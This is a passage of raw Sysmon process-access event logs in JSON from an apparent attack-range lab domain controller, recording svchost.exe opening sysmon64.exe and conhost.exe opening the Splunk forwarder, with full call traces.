C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1981,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1982,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1983,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1984,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1985,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1986,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1987,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1988,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-00101FDA0300}\r\nTargetProcessId: 3992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 